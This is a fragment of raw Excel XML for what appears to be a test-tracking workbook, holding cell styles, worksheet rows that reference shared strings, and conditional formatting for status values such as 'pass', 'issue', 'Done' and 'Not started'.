    <xf numFmtId="0" fontId="12" fillId="0" borderId="1" xfId="49" applyFont="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="1" xfId="49" applyFont="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
  </cellXfs>
  <cellStyles count="52">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 name="Normal 3" xfId="49"/>
    <cellStyle name="Normal 2" xfId="50"/>
    <cellStyle name="Normal 4" xfId="51"/>
  </cellStyles>
  <dxfs count="11">
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FF93C47D"/>
          <bgColor rgb="FF93C47D"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFFFE599"/>
          <bgColor rgb="FFFFE599"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFFFFFFF"/>
          <bgColor rgb="FFFFFFFF"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FF9C0006"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFFFC7CE"/>
          <bgColor rgb="FFFFC7CE"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FF9C6500"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFFFEB9C"/>
          <bgColor rgb="FFFFEB9C"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FF006100"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFC6EFCE"/>
          <bgColor rgb="FFC6EFCE"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFFFFFF"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFBC204B"/>
          <bgColor rgb="FFBC204B"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFFFFFF"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFEAAA00"/>
          <bgColor rgb="FFEAAA00"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFFFFFF"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FF43B02A"/>
          <bgColor rgb="FF43B02A"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFFFFFF"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FF0091DA"/>
          <bgColor rgb="FF0091DA"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFFFFFF"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FF6D2077"/>
          <bgColor rgb="FF6D207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1"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="D3" sqref="D3"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="14.1"/>
  <cols>
    <col min="1" max="2" width="9" style="11"/>
    <col min="3" max="3" width="41.1891891891892" style="11" customWidth="1"/>
    <col min="4" max="4" width="113.504504504505" style="11" customWidth="1"/>
    <col min="5" max="5" width="31.9459459459459" style="11" customWidth="1"/>
    <col min="6" max="6" width="19.7567567567568" style="11" customWidth="1"/>
    <col min="7" max="7" width="17.3243243243243" style="11" customWidth="1"/>
    <col min="8" max="8" width="9" style="11"/>
    <col min="9" max="9" width="14.7477477477477" style="11" customWidth="1"/>
    <col min="10" max="10" width="12.8558558558559" style="11" customWidth="1"/>
    <col min="11" max="16384" width="9" style="11"/>
  </cols>
  <sheetData>
    <row r="1" ht="18.4" spans="1:10">
      <c r="A1" s="1" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="1"/>
      <c r="C1" s="1"/>
      <c r="D1" s="1"/>
      <c r="E1" s="1"/>
      <c r="F1" s="1"/>
      <c r="G1" s="1"/>
      <c r="H1" s="1"/>
      <c r="I1" s="1"/>
      <c r="J1" s="1"/>
    </row>
    <row r="3" ht="30" spans="1:10">
      <c r="A3" s="5" t="s">
        <v>1</v>
      </c>
      <c r="B3" s="5" t="s">
        <v>2</v>
      </c>
      <c r="C3" s="5" t="s">
        <v>3</v>
      </c>
      <c r="D3" s="5" t="s">
        <v>4</v>
      </c>
      <c r="E3" s="5" t="s">
        <v>5</v>
      </c>
      <c r="F3" s="5" t="s">
        <v>6</v>
      </c>
      <c r="G3" s="5" t="s">
        <v>7</v>
      </c>
      <c r="H3" s="5" t="s">
        <v>8</v>
      </c>
      <c r="I3" s="5" t="s">
        <v>9</v>
      </c>
      <c r="J3" s="5" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="4" ht="42.45" spans="1:10">
      <c r="A4" s="12" t="s">
        <v>11</v>
      </c>
      <c r="B4" s="48" t="s">
        <v>12</v>
      </c>
      <c r="C4" s="14" t="s">
        <v>13</v>
      </c>
      <c r="D4" s="51" t="s">
        <v>14</v>
      </c>
      <c r="E4" s="41" t="s">
        <v>15</v>
      </c>
      <c r="F4" s="14" t="s">
        <v>16</v>
      </c>
      <c r="G4" s="14" t="s">
        <v>16</v>
      </c>
      <c r="H4" s="14"/>
      <c r="I4" s="14"/>
      <c r="J4" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="5" ht="29.15" spans="1:10">
      <c r="A5" s="12" t="s">
        <v>18</v>
      </c>
      <c r="B5" s="48" t="s">
        <v>19</v>
      </c>
      <c r="C5" s="14" t="s">
        <v>20</v>
      </c>
      <c r="D5" s="51" t="s">
        <v>21</v>
      </c>
      <c r="E5" s="41" t="s">
        <v>22</v>
      </c>
      <c r="F5" s="41" t="s">
        <v>23</v>
      </c>
      <c r="G5" s="41" t="s">
        <v>24</v>
      </c>
      <c r="H5" s="14"/>
      <c r="I5" s="14"/>
      <c r="J5" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="6" ht="42.45" spans="1:10">
      <c r="A6" s="12" t="s">
        <v>25</v>
      </c>
      <c r="B6" s="48" t="s">
        <v>26</v>
      </c>
      <c r="C6" s="14" t="s">
        <v>27</v>
      </c>
      <c r="D6" s="15" t="s">
        <v>28</v>
      </c>
      <c r="E6" s="41" t="s">
        <v>29</v>
      </c>
      <c r="F6" s="52" t="s">
        <v>30</v>
      </c>
      <c r="G6" s="14" t="s">
        <v>31</v>
      </c>
      <c r="H6" s="41"/>
      <c r="I6" s="14"/>
      <c r="J6" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="7" ht="29.15" spans="1:10">
      <c r="A7" s="12" t="s">
        <v>32</v>
      </c>
      <c r="B7" s="48" t="s">
        <v>33</v>
      </c>
      <c r="C7" s="14" t="s">
        <v>34</v>
      </c>
      <c r="D7" s="15" t="s">
        <v>35</v>
      </c>
      <c r="E7" s="14" t="s">
        <v>36</v>
      </c>
      <c r="F7" s="41" t="s">
        <v>16</v>
      </c>
      <c r="G7" s="14" t="s">
        <v>16</v>
      </c>
      <c r="H7" s="41"/>
      <c r="I7" s="14"/>
      <c r="J7" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="8" ht="42.45" spans="1:10">
      <c r="A8" s="12" t="s">
        <v>37</v>
      </c>
      <c r="B8" s="48" t="s">
        <v>38</v>
      </c>
      <c r="C8" s="14" t="s">
        <v>39</v>
      </c>
      <c r="D8" s="15" t="s">
        <v>40</v>
      </c>
      <c r="E8" s="41" t="s">
        <v>29</v>
      </c>
      <c r="F8" s="52" t="s">
        <v>30</v>
      </c>
      <c r="G8" s="41" t="s">
        <v>41</v>
      </c>
      <c r="H8" s="41"/>
      <c r="I8" s="14"/>
      <c r="J8" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="9" ht="29.15" spans="1:10">
      <c r="A9" s="12" t="s">
        <v>42</v>
      </c>
      <c r="B9" s="48" t="s">
        <v>43</v>
      </c>
      <c r="C9" s="14" t="s">
        <v>44</v>
      </c>
      <c r="D9" s="51" t="s">
        <v>45</v>
      </c>
      <c r="E9" s="41" t="s">
        <v>46</v>
      </c>
      <c r="F9" s="14" t="s">
        <v>16</v>
      </c>
      <c r="G9" s="14" t="s">
        <v>16</v>
      </c>
      <c r="H9" s="14"/>
      <c r="I9" s="14"/>
      <c r="J9" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="10" ht="29.15" spans="1:10">
      <c r="A10" s="12" t="s">
        <v>47</v>
      </c>
      <c r="B10" s="48" t="s">
        <v>48</v>
      </c>
      <c r="C10" s="14" t="s">
        <v>49</v>
      </c>
      <c r="D10" s="15" t="s">
        <v>50</v>
      </c>
      <c r="E10" s="14" t="s">
        <v>51</v>
      </c>
      <c r="F10" s="14" t="s">
        <v>16</v>
      </c>
      <c r="G10" s="14" t="s">
        <v>16</v>
      </c>
      <c r="H10" s="14"/>
      <c r="I10" s="14"/>
      <c r="J10" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="11" ht="42.45" spans="1:10">
      <c r="A11" s="12" t="s">
        <v>52</v>
      </c>
      <c r="B11" s="48" t="s">
        <v>53</v>
      </c>
      <c r="C11" s="14" t="s">
        <v>54</v>
      </c>
      <c r="D11" s="15" t="s">
        <v>55</v>
      </c>
      <c r="E11" s="41" t="s">
        <v>56</v>
      </c>
      <c r="F11" s="41" t="s">
        <v>23</v>
      </c>
      <c r="G11" s="41" t="s">
        <v>57</v>
      </c>
      <c r="H11" s="14"/>
      <c r="I11" s="14"/>
      <c r="J11" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="12" ht="29.15" spans="1:10">
      <c r="A12" s="12" t="s">
        <v>58</v>
      </c>
      <c r="B12" s="48" t="s">
        <v>59</v>
      </c>
      <c r="C12" s="14" t="s">
        <v>60</v>
      </c>
      <c r="D12" s="51" t="s">
        <v>61</v>
      </c>
      <c r="E12" s="14" t="s">
        <v>16</v>
      </c>
      <c r="F12" s="41" t="s">
        <v>16</v>
      </c>
      <c r="G12" s="14" t="s">
        <v>16</v>
      </c>
      <c r="H12" s="41"/>
      <c r="I12" s="14"/>
      <c r="J12" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="13" ht="56.55" spans="1:10">
      <c r="A13" s="12" t="s">
        <v>62</v>
      </c>
      <c r="B13" s="48" t="s">
        <v>63</v>
      </c>
      <c r="C13" s="14" t="s">
        <v>64</v>
      </c>
      <c r="D13" s="15" t="s">
        <v>65</v>
      </c>
      <c r="E13" s="41" t="s">
        <v>66</v>
      </c>
      <c r="F13" s="41" t="s">
        <v>16</v>
      </c>
      <c r="G13" s="14" t="s">
        <v>16</v>
      </c>
      <c r="H13" s="41"/>
      <c r="I13" s="14"/>
      <c r="J13" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="18" ht="14.15" spans="1:1">
      <c r="A18" s="25" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="19" ht="14.15" spans="1:1">
      <c r="A19" s="27" t="s">
        <v>68</v>
      </c>
    </row>
    <row r="20" ht="14.15" spans="1:1">
      <c r="A20" s="28" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="21" ht="14.15" spans="1:1">
      <c r="A21" s="17" t="s">
        <v>70</v>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A3:J13">
    <extLst/>
  </autoFilter>
  <mergeCells count="2">
    <mergeCell ref="A1:J1"/>
    <mergeCell ref="A2:J2"/>
  </mergeCells>
  <conditionalFormatting sqref="I1:J1">
    <cfRule type="containsText" dxfId="0" priority="18" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="17" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="16" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I1)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A19">
    <cfRule type="cellIs" dxfId="3" priority="9" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="8" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="7" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A20">
    <cfRule type="cellIs" dxfId="3" priority="6" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="5" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="4" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A21">
    <cfRule type="cellIs" dxfId="3" priority="3" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="2" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="1" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="1">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" prompt="result" sqref="H4:H13">
      <formula1>$A$19:$A$21</formula1>
    </dataValidation>
  </dataValidations>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3"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="D16" sqref="D16"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="14.1"/>
  <cols>
    <col min="1" max="1" width="9" style="11"/>
    <col min="2" max="2" width="12.5765765765766" style="11" customWidth="1"/>
    <col min="3" max="3" width="41.1891891891892" style="11" customWidth="1"/>
    <col min="4" max="4" width="80.9279279279279" style="11" customWidth="1"/>
    <col min="5" max="5" width="31.9459459459459" style="11" customWidth="1"/>
    <col min="6" max="6" width="19.7567567567568" style="11" customWidth="1"/>
    <col min="7" max="7" width="17.3243243243243" style="11" customWidth="1"/>
    <col min="8" max="8" width="9" style="11"/>
    <col min="9" max="9" width="14.7477477477477" style="11" customWidth="1"/>
    <col min="10" max="10" width="12.8558558558559" style="11" customWidth="1"/>
    <col min="11" max="16384" width="9" style="11"/>
  </cols>
  <sheetData>
    <row r="1" s="11" customFormat="1" ht="18.4" spans="1:10">
      <c r="A1" s="1" t="s">
        <v>460</v>
      </c>
      <c r="B1" s="1"/>
      <c r="C1" s="1"/>
      <c r="D1" s="1"/>
      <c r="E1" s="1"/>
      <c r="F1" s="1"/>
      <c r="G1" s="1"/>
      <c r="H1" s="1"/>
      <c r="I1" s="1"/>
      <c r="J1" s="1"/>
    </row>
    <row r="3" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A3" s="5" t="s">
        <v>1</v>
      </c>
      <c r="B3" s="5" t="s">
        <v>2</v>
      </c>
      <c r="C3" s="5" t="s">
        <v>3</v>
      </c>
      <c r="D3" s="5" t="s">
        <v>4</v>
      </c>
      <c r="E3" s="5" t="s">
        <v>5</v>
      </c>
      <c r="F3" s="5" t="s">
        <v>6</v>
      </c>
      <c r="G3" s="5" t="s">
        <v>7</v>
      </c>
      <c r="H3" s="5" t="s">
        <v>8</v>
      </c>
      <c r="I3" s="5" t="s">
        <v>9</v>
      </c>
      <c r="J3" s="5" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="4" s="11" customFormat="1" ht="42.45" spans="1:10">
      <c r="A4" s="12" t="s">
        <v>461</v>
      </c>
      <c r="B4" s="13" t="s">
        <v>462</v>
      </c>
      <c r="C4" s="14" t="s">
        <v>463</v>
      </c>
      <c r="D4" s="15" t="s">
        <v>464</v>
      </c>
      <c r="E4" s="16" t="s">
        <v>51</v>
      </c>
      <c r="F4" s="17" t="s">
        <v>157</v>
      </c>
      <c r="G4" s="17" t="s">
        <v>465</v>
      </c>
      <c r="H4" s="17"/>
      <c r="I4" s="32"/>
      <c r="J4" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="5" s="11" customFormat="1" ht="29.15" spans="1:10">
      <c r="A5" s="12" t="s">
        <v>466</v>
      </c>
      <c r="B5" s="13" t="s">
        <v>467</v>
      </c>
      <c r="C5" s="14" t="s">
        <v>468</v>
      </c>
      <c r="D5" s="15" t="s">
        <v>469</v>
      </c>
      <c r="E5" s="16" t="s">
        <v>51</v>
      </c>
      <c r="F5" s="17" t="s">
        <v>157</v>
      </c>
      <c r="G5" s="17" t="s">
        <v>465</v>
      </c>
      <c r="H5" s="17"/>
      <c r="I5" s="32"/>
      <c r="J5" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="6" s="11" customFormat="1" ht="56.55" spans="1:10">
      <c r="A6" s="12" t="s">
        <v>470</v>
      </c>
      <c r="B6" s="13" t="s">
        <v>471</v>
      </c>
      <c r="C6" s="35" t="s">
        <v>472</v>
      </c>
      <c r="D6" s="36" t="s">
        <v>473</v>
      </c>
      <c r="E6" s="16" t="s">
        <v>474</v>
      </c>
      <c r="F6" s="17" t="s">
        <v>157</v>
      </c>
      <c r="G6" s="17" t="s">
        <v>475</v>
      </c>
      <c r="H6" s="17"/>
      <c r="I6" s="32"/>
      <c r="J6" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="7" s="11" customFormat="1" ht="56.55" spans="1:10">
      <c r="A7" s="12" t="s">
        <v>476</v>
      </c>
      <c r="B7" s="13" t="s">
        <v>477</v>
      </c>
      <c r="C7" s="35" t="s">
        <v>478</v>
      </c>
      <c r="D7" s="36" t="s">
        <v>479</v>
      </c>
      <c r="E7" s="16" t="s">
        <v>51</v>
      </c>
      <c r="F7" s="17" t="s">
        <v>157</v>
      </c>
      <c r="G7" s="17" t="s">
        <v>480</v>
      </c>
      <c r="H7" s="17"/>
      <c r="I7" s="32"/>
      <c r="J7" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="8" s="11" customFormat="1" ht="56.55" spans="1:10">
      <c r="A8" s="12" t="s">
        <v>481</v>
      </c>
      <c r="B8" s="13" t="s">
        <v>482</v>
      </c>
      <c r="C8" s="35" t="s">
        <v>483</v>
      </c>
      <c r="D8" s="36" t="s">
        <v>484</v>
      </c>
      <c r="E8" s="16" t="s">
        <v>51</v>
      </c>
      <c r="F8" s="17" t="s">
        <v>485</v>
      </c>
      <c r="G8" s="17" t="s">
        <v>486</v>
      </c>
      <c r="H8" s="17"/>
      <c r="I8" s="32"/>
      <c r="J8" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="9" s="11" customFormat="1" ht="42.45" spans="1:10">
      <c r="A9" s="12" t="s">
        <v>487</v>
      </c>
      <c r="B9" s="13" t="s">
        <v>488</v>
      </c>
      <c r="C9" s="35" t="s">
        <v>489</v>
      </c>
      <c r="D9" s="36" t="s">
        <v>490</v>
      </c>
      <c r="E9" s="16" t="s">
        <v>51</v>
      </c>
      <c r="F9" s="17" t="s">
        <v>157</v>
      </c>
      <c r="G9" s="17" t="s">
        <v>305</v>
      </c>
      <c r="H9" s="17"/>
      <c r="I9" s="32"/>
      <c r="J9" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="10" s="11" customFormat="1" ht="99" spans="1:10">
      <c r="A10" s="12" t="s">
        <v>491</v>
      </c>
      <c r="B10" s="13" t="s">
        <v>492</v>
      </c>
      <c r="C10" s="35" t="s">
        <v>493</v>
      </c>
      <c r="D10" s="36" t="s">
        <v>494</v>
      </c>
      <c r="E10" s="16" t="s">
        <v>51</v>
      </c>
      <c r="F10" s="17" t="s">
        <v>157</v>
      </c>
      <c r="G10" s="17" t="s">
        <v>495</v>
      </c>
      <c r="H10" s="17"/>
      <c r="I10" s="32"/>
      <c r="J10" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="11" s="11" customFormat="1" ht="56.55" spans="1:10">
      <c r="A11" s="12" t="s">
        <v>496</v>
      </c>
      <c r="B11" s="13" t="s">
        <v>497</v>
      </c>
      <c r="C11" s="35" t="s">
        <v>498</v>
      </c>
      <c r="D11" s="36" t="s">
        <v>499</v>
      </c>
      <c r="E11" s="16" t="s">
        <v>51</v>
      </c>
      <c r="F11" s="17" t="s">
        <v>157</v>
      </c>
      <c r="G11" s="17" t="s">
        <v>500</v>
      </c>
      <c r="H11" s="17"/>
      <c r="I11" s="32"/>
      <c r="J11" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="12" s="11" customFormat="1" ht="84.85" spans="1:10">
      <c r="A12" s="12" t="s">
        <v>501</v>
      </c>
      <c r="B12" s="13" t="s">
        <v>502</v>
      </c>
      <c r="C12" s="35" t="s">
        <v>503</v>
      </c>
      <c r="D12" s="36" t="s">
        <v>504</v>
      </c>
      <c r="E12" s="16" t="s">
        <v>51</v>
      </c>
      <c r="F12" s="17" t="s">
        <v>157</v>
      </c>
      <c r="G12" s="17" t="s">
        <v>505</v>
      </c>
      <c r="H12" s="17"/>
      <c r="I12" s="32"/>
      <c r="J12" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="13" s="11" customFormat="1" ht="42.45" spans="1:10">
      <c r="A13" s="12" t="s">
        <v>506</v>
      </c>
      <c r="B13" s="13" t="s">
        <v>507</v>
      </c>
      <c r="C13" s="35" t="s">
        <v>508</v>
      </c>
      <c r="D13" s="36" t="s">
        <v>509</v>
      </c>
      <c r="E13" s="16" t="s">
        <v>51</v>
      </c>
      <c r="F13" s="17" t="s">
        <v>157</v>
      </c>
      <c r="G13" s="17" t="s">
        <v>510</v>
      </c>
      <c r="H13" s="17"/>
      <c r="I13" s="32"/>
      <c r="J13" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="14" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A14" s="18"/>
      <c r="B14" s="19"/>
      <c r="C14" s="20"/>
      <c r="D14" s="21"/>
      <c r="E14" s="26"/>
      <c r="F14" s="24"/>
      <c r="G14" s="24"/>
      <c r="H14" s="24"/>
      <c r="I14" s="33"/>
      <c r="J14" s="20"/>
    </row>
    <row r="15" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A15" s="18"/>
      <c r="B15" s="19"/>
      <c r="C15" s="20"/>
      <c r="D15" s="31"/>
      <c r="E15" s="26"/>
      <c r="F15" s="24"/>
      <c r="G15" s="24"/>
      <c r="H15" s="20"/>
      <c r="I15" s="20"/>
      <c r="J15" s="20"/>
    </row>
    <row r="16" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A16" s="25" t="s">
        <v>67</v>
      </c>
      <c r="B16" s="19"/>
      <c r="C16" s="20"/>
      <c r="D16" s="20"/>
      <c r="E16" s="26"/>
      <c r="F16" s="24"/>
      <c r="G16" s="24"/>
      <c r="H16" s="20"/>
      <c r="I16" s="20"/>
      <c r="J16" s="20"/>
    </row>
    <row r="17" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A17" s="27" t="s">
        <v>68</v>
      </c>
      <c r="B17" s="19"/>
      <c r="C17" s="20"/>
      <c r="D17" s="31"/>
      <c r="E17" s="26"/>
      <c r="F17" s="24"/>
      <c r="G17" s="24"/>
      <c r="H17" s="20"/>
      <c r="I17" s="20"/>
      <c r="J17" s="20"/>
    </row>
    <row r="18" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A18" s="28" t="s">
        <v>69</v>
      </c>
      <c r="B18" s="19"/>
      <c r="C18" s="20"/>
      <c r="D18" s="31"/>
      <c r="E18" s="26"/>
      <c r="F18" s="24"/>
      <c r="G18" s="24"/>
      <c r="H18" s="20"/>
      <c r="I18" s="20"/>
      <c r="J18" s="20"/>
    </row>
    <row r="19" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A19" s="17" t="s">
        <v>70</v>
      </c>
      <c r="B19" s="19"/>
      <c r="C19" s="20"/>
      <c r="D19" s="31"/>
      <c r="E19" s="26"/>
      <c r="F19" s="23"/>
      <c r="G19" s="23"/>
      <c r="H19" s="20"/>
      <c r="I19" s="20"/>
      <c r="J19" s="20"/>
    </row>
    <row r="20" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A20" s="18"/>
      <c r="B20" s="19"/>
      <c r="C20" s="20"/>
      <c r="D20" s="31"/>
      <c r="E20" s="26"/>
      <c r="F20" s="24"/>
      <c r="G20" s="24"/>
      <c r="H20" s="20"/>
      <c r="I20" s="20"/>
      <c r="J20" s="20"/>
    </row>
    <row r="21" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A21" s="18"/>
      <c r="B21" s="19"/>
      <c r="C21" s="20"/>
      <c r="D21" s="31"/>
      <c r="E21" s="26"/>
      <c r="F21" s="24"/>
      <c r="G21" s="24"/>
      <c r="H21" s="20"/>
      <c r="I21" s="20"/>
      <c r="J21" s="20"/>
    </row>
    <row r="22" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A22" s="18"/>
      <c r="B22" s="19"/>
      <c r="C22" s="20"/>
      <c r="D22" s="31"/>
      <c r="E22" s="26"/>
      <c r="F22" s="24"/>
      <c r="G22" s="24"/>
      <c r="H22" s="20"/>
      <c r="I22" s="20"/>
      <c r="J22" s="20"/>
    </row>
    <row r="23" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A23" s="18"/>
      <c r="B23" s="19"/>
      <c r="C23" s="20"/>
      <c r="D23" s="31"/>
      <c r="E23" s="26"/>
      <c r="F23" s="24"/>
      <c r="G23" s="24"/>
      <c r="H23" s="20"/>
      <c r="I23" s="20"/>
      <c r="J23" s="20"/>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A1:J1"/>
    <mergeCell ref="A2:J2"/>
  </mergeCells>
  <conditionalFormatting sqref="I1:J1">
    <cfRule type="containsText" dxfId="0" priority="42" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="41" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="40" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I1)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H9">
    <cfRule type="cellIs" dxfId="3" priority="21" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="20" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="19" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I9">
    <cfRule type="containsText" dxfId="0" priority="24" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I9)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="23" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I9)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="22" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I9)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H10">
    <cfRule type="cellIs" dxfId="3" priority="15" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="14" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="13" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I10">
    <cfRule type="containsText" dxfId="0" priority="18" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I10)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="17" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I10)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="16" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I10)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H11">
    <cfRule type="cellIs" dxfId="3" priority="9" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="8" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="7" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I11">
    <cfRule type="containsText" dxfId="0" priority="12" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I11)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="11" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I11)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="10" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I11)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A17">
    <cfRule type="cellIs" dxfId="5" priority="37" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="38" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="3" priority="39" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A18">
    <cfRule type="cellIs" dxfId="5" priority="34" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="35" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="3" priority="36" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A19">
